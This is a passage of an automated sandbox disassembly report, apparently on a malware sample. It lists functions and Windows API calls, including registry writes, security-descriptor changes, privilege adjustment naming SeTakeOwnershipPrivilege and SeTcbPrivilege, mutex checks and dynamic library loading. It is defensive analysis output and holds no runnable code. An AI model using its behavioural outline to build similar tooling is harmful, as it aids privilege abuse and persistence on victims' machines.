Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

_time64.MSVCRT ref: 001E5E4C
_localtime64.MSVCRT ref: 001E5E5D
wcsftime.MSVCRT ref: 001E5E87

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Strings

p9?, xrefs: 001E5C87, 001E5CC6, 001E5CE8, 001E5CFD, 001E5D19, 001E5F8A, 001E5F9E
<, xrefs: 001E5E52

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F2870, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122
registry

Control-flow Graph

Executed
Not Executed

APIs

StrChrW.SHLWAPI(?,0000005C), ref: 001F28A3
RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001F28B8
GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000,00000000), ref: 001F28DD

Part of subcall function 001E80B0: memset.MSVCRT ref: 001E8138
Part of subcall function 001E80B0: SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001E81B5

StrChrW.SHLWAPI(?,0000005C), ref: 001F2906
RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001F2921
RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 001F2946
SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 001F2962

Strings

p9?, xrefs: 001F288C, 001F28CD, 001F290C, 001F2936, 001F294B, 001F2970, 001F298F, 001F29A1

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E33A0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 229

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32(?), ref: 001E3575
SysFreeString.OLEAUT32(?), ref: 001E359B

Part of subcall function 001E33A0: VariantClear.OLEAUT32(?), ref: 001E3432
Part of subcall function 001E33A0: SysFreeString.OLEAUT32(001E632B), ref: 001E345C
Part of subcall function 001E33A0: SysFreeString.OLEAUT32(?), ref: 001E34D6

Strings

p9?, xrefs: 001E347E, 001E34A3

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E80B0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 199

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 001E8138
SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001E81B5

Part of subcall function 001F3130: AdjustTokenPrivileges.KERNELBASE(001E81FD,00000000,?,00000010,00000000,00000000), ref: 001F3192

SetSecurityInfo.ADVAPI32(?,?,00000001,?,00000000,00000000,00000000), ref: 001E821E
SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 001E8256

Strings

SeTakeOwnershipPrivilege, xrefs: 001E81F3, 001E822C
p9?, xrefs: 001E80B8, 001E8101, 001E8151, 001E81A1, 001E81CA, 001E820A, 001E8243, 001E825F, 001E8273, 001E828A, 001E829E, 001E82B4

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EFE58, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 145
sleep

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6386
Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E639E
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64AC
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64B2
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64B8
Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E64F9
Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6517
Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6538
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E660F
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E6618
Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E661E

Part of subcall function 001E1B70: memset.MSVCRT ref: 001E1BA3
Part of subcall function 001E1B70: memset.MSVCRT ref: 001E1BB2
Part of subcall function 001E1B70: ??2@YAPAXI@Z.MSVCRT ref: 001E1BC9
Part of subcall function 001E1B70: ??2@YAPAXI@Z.MSVCRT ref: 001E1BE8

Part of subcall function 001E1F50: memcpy.MSVCRT ref: 001E1FEC

Part of subcall function 001E6A70: ??2@YAPAXI@Z.MSVCRT ref: 001E6A86
Part of subcall function 001E6A70: ??2@YAPAXI@Z.MSVCRT ref: 001E6AA1
Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6BB0
Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6BDE
Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6C48
Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6CA1

Part of subcall function 001EFAD0: ??3@YAXPAX@Z.MSVCRT ref: 001EFB8D
Part of subcall function 001EFAD0: ??3@YAXPAX@Z.MSVCRT ref: 001EFBA4

Part of subcall function 001E5780: ??2@YAPAXI@Z.MSVCRT ref: 001E57D5
Part of subcall function 001E5780: ??3@YAXPAX@Z.MSVCRT ref: 001E582F

Part of subcall function 001EDA20: ??2@YAPAXI@Z.MSVCRT ref: 001EDA7A
Part of subcall function 001EDA20: ??3@YAXPAX@Z.MSVCRT ref: 001EDAB9
Part of subcall function 001EDA20: _time64.MSVCRT ref: 001EDADB
Part of subcall function 001EDA20: ??3@YAXPAX@Z.MSVCRT ref: 001EDB0B

Part of subcall function 001F1D50: ??2@YAPAXI@Z.MSVCRT ref: 001F1D7F
Part of subcall function 001F1D50: ??3@YAXPAX@Z.MSVCRT ref: 001F1DBE
Part of subcall function 001F1D50: _time64.MSVCRT ref: 001F1DE0
Part of subcall function 001F1D50: ??3@YAXPAX@Z.MSVCRT ref: 001F1E0D

Part of subcall function 001EADB0: ??3@YAXPAX@Z.MSVCRT ref: 001EADEF
Part of subcall function 001EADB0: ??3@YAXPAX@Z.MSVCRT ref: 001EAF9A

Part of subcall function 001F14C0: WSAStartup.WS2_32(00000202,?), ref: 001F14E2
Part of subcall function 001F14C0: gethostname.WS2_32(?,000000FF), ref: 001F1502
Part of subcall function 001F14C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 001F1522
Part of subcall function 001F14C0: freeaddrinfo.WS2_32(00000000), ref: 001F1580
Part of subcall function 001F14C0: WSACleanup.WS2_32 ref: 001F1586

Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F

Part of subcall function 001E37C0: memcpy.MSVCRT ref: 001E3CA0

Part of subcall function 001E2030: ??2@YAPAXI@Z.MSVCRT ref: 001E207A
Part of subcall function 001E2030: ??3@YAXPAX@Z.MSVCRT ref: 001E2176
Part of subcall function 001E2030: _time64.MSVCRT ref: 001E21A8
Part of subcall function 001E2030: ??3@YAXPAX@Z.MSVCRT ref: 001E21CF

Part of subcall function 001E9AB0: WSAStartup.WS2_32(00000202,?), ref: 001E9ADA
Part of subcall function 001E9AB0: freeaddrinfo.WS2_32(00000000,001F043A), ref: 001E9B3B
Part of subcall function 001E9AB0: getaddrinfo.WS2_32(001F043A,00000000,?,00000000), ref: 001E9BD6
Part of subcall function 001E9AB0: freeaddrinfo.WS2_32(00000000), ref: 001E9C1E
Part of subcall function 001E9AB0: WSACleanup.WS2_32 ref: 001E9C44

Part of subcall function 001F2AD0: ??2@YAPAXI@Z.MSVCRT ref: 001F2ADD
Part of subcall function 001F2AD0: ??3@YAXPAX@Z.MSVCRT ref: 001F2B54
Part of subcall function 001F2AD0: _time64.MSVCRT ref: 001F2B82
Part of subcall function 001F2AD0: ??3@YAXPAX@Z.MSVCRT ref: 001F2BAA

Part of subcall function 001EEAC0: CoCreateInstance.OLE32(001F708C,00000000,00000001,001F6E7C,00000004,001F8880,000003E7,001EFF87), ref: 001EEB17

Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2C56
Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2C90
Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2CDB
Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D75
Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D8A
Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D9E

Sleep.KERNELBASE(00000001), ref: 001EFE80
SetCurrentDirectoryW.KERNELBASE(?), ref: 001EFEF3
srand.MSVCRT ref: 001EFF04

Part of subcall function 001EEDA0: LoadLibraryW.KERNEL32(?), ref: 001EEDF2
Part of subcall function 001EEDA0: LoadLibraryW.KERNEL32(?), ref: 001EEE19
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE47
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE6F
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE97
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEEBF
Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEEE7

Part of subcall function 001EBC10: CoInitializeEx.OLE32(00000000,00000000), ref: 001EBC14
Part of subcall function 001EBC10: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 001EBC33

GetCurrentProcess.KERNEL32(?), ref: 001EFF44
IsWow64Process.KERNELBASE(00000000), ref: 001EFF4B
??2@YAPAXI@Z.MSVCRT ref: 001EFF74
??3@YAXPAX@Z.MSVCRT ref: 001EFFB1
??2@YAPAXI@Z.MSVCRT ref: 001F0004
_time64.MSVCRT ref: 001F014D
_time64.MSVCRT ref: 001F0338
_time64.MSVCRT ref: 001F04B4

Part of subcall function 001EC980: _itow.MSVCRT ref: 001EC999

ExitProcess.KERNEL32 ref: 001F0706

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Part of subcall function 001E35E0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,001F8880,000003E7), ref: 001E3622
Part of subcall function 001E35E0: CreateMutexW.KERNELBASE(?,00000001,?), ref: 001E366B
Part of subcall function 001E35E0: ExitProcess.KERNEL32 ref: 001E368E

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001E95A0: FreeLibrary.KERNELBASE(00000000,001F0700), ref: 001E95D1

Strings

D, xrefs: 001F061D
p9?, xrefs: 001EFE60, 001EFE75, 001EFE87, 001EFEB9, 001EFECD, 001EFEE1, 001EFEF5, 001F0601, 001F0695, 001F06AC, 001F06CC, 001F06DE

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001ED020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
registrystring

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(001EF91F,00000000,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002,-00000002), ref: 001ED03D
RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36), ref: 001ED061
RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED07C
RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED09C

Strings

p9?, xrefs: 001ED047, 001ED063, 001ED083, 001ED0AB

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EF320, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 001EF33E
GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 001EF352
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EF38E

Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52

Strings

:, xrefs: 001EF383

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E35E0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,001F8880,000003E7), ref: 001E3622

Part of subcall function 001EF320: memset.MSVCRT ref: 001EF33E
Part of subcall function 001EF320: GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 001EF352
Part of subcall function 001EF320: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001EF38E

CreateMutexW.KERNELBASE(?,00000001,?), ref: 001E366B
ExitProcess.KERNEL32 ref: 001E368E

Strings

p9?, xrefs: 001E3605, 001E3652, 001E3676, 001E3694

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F3543, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11

APIs

__wgetmainargs.MSVCRT ref: 001F3567

Strings

8/?, xrefs: 001F3558
($?, xrefs: 001F355D

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F29C0, Relevance: 5.1, APIs: 4, Instructions: 55

APIs

memset.MSVCRT ref: 001F29D8

Part of subcall function 001F2870: StrChrW.SHLWAPI(?,0000005C), ref: 001F28A3
Part of subcall function 001F2870: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001F28B8
Part of subcall function 001F2870: GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000,00000000), ref: 001F28DD
Part of subcall function 001F2870: StrChrW.SHLWAPI(?,0000005C), ref: 001F2906
Part of subcall function 001F2870: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 001F2921
Part of subcall function 001F2870: RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 001F2946
Part of subcall function 001F2870: SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 001F2962

memset.MSVCRT ref: 001F2A05
StrStrW.SHLWAPI(?,001F424C), ref: 001F2A22

Part of subcall function 001EF8B0: memset.MSVCRT ref: 001EF8E0
Part of subcall function 001EF8B0: memcpy.MSVCRT ref: 001EF8EB

memset.MSVCRT ref: 001F2A47

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EF8B0, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92

APIs

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

memset.MSVCRT ref: 001EF8E0
memcpy.MSVCRT ref: 001EF8EB

Part of subcall function 001E98F0: RegCreateKeyExW.KERNEL32(00000000,80000002,00000000,00000000,00000000,00020106,00000000,00000000,00000000,00000000), ref: 001E993A

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001ED020: lstrlenW.KERNEL32(001EF91F,00000000,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002,-00000002), ref: 001ED03D
Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36), ref: 001ED061
Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED07C
Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED09C

Strings

p9?, xrefs: 001EF8C2, 001EF8F0, 001EF945

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E3EB0, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 27

APIs

??2@YAPAXI@Z.MSVCRT ref: 001E3EB7
memset.MSVCRT ref: 001E3ECD

Part of subcall function 001EF4D0: LoadLibraryW.KERNEL32(?), ref: 001EF4F8
Part of subcall function 001EF4D0: GetProcAddress.KERNEL32(001E3EF7,?), ref: 001EF52D

Strings

p9?, xrefs: 001E3ED5, 001E3EDD

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F0659, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59

APIs

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001E95A0: FreeLibrary.KERNELBASE(00000000,001F0700), ref: 001E95D1

ExitProcess.KERNEL32 ref: 001F0706

Strings

p9?, xrefs: 001F0695, 001F06AC, 001F06CC, 001F06DE

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E98F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46registry

APIs

Part of subcall function 001ED020: lstrlenW.KERNEL32(001EF91F,00000000,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002,-00000002), ref: 001ED03D
Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,00000000,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36), ref: 001ED061
Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED07C
Part of subcall function 001ED020: RegOpenKeyExW.KERNEL32(80000002,001EF91F,00000000,00020119,80000002,?,001EF91F,80000002,00000000,?,?,?,?,?,001F2A36,80000002), ref: 001ED09C

RegCreateKeyExW.KERNEL32(00000000,80000002,00000000,00000000,00000000,00020106,00000000,00000000,00000000,00000000), ref: 001E993A

Strings

p9?, xrefs: 001E9919, 001E9943

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E95A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18

APIs

FreeLibrary.KERNELBASE(00000000,001F0700), ref: 001E95D1

Strings

p9?, xrefs: 001E95AA, 001E95C7

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EF4D0, Relevance: 3.0, APIs: 2, Instructions: 43library

APIs

LoadLibraryW.KERNEL32(?), ref: 001EF4F8
GetProcAddress.KERNEL32(001E3EF7,?), ref: 001EF52D

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EBC10, Relevance: 3.0, APIs: 2, Instructions: 22

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 001EBC14
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 001EBC33

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Non-executed Functions

Function 001EC430, Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 381library

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 001EC4E2
GetProcAddress.KERNEL32(00000000,?), ref: 001EC505
GetProcAddress.KERNEL32(00000000,?), ref: 001EC528
GetProcAddress.KERNEL32(00000000,?), ref: 001EC54B
GetLastError.KERNEL32 ref: 001EC6BB

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Strings

, xrefs: 001EC77B
D, xrefs: 001EC460
p9?, xrefs: 001EC439, 001EC4A1, 001EC55F, 001EC584, 001EC5AB, 001EC63F, 001EC663, 001EC68A, 001EC69B, 001EC6EB, 001EC718, 001EC771, 001EC7C0, 001EC7F0, 001EC82F, 001EC844, 001EC85A, 001EC87D, 001EC898
SeTcbPrivilege, xrefs: 001EC594

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

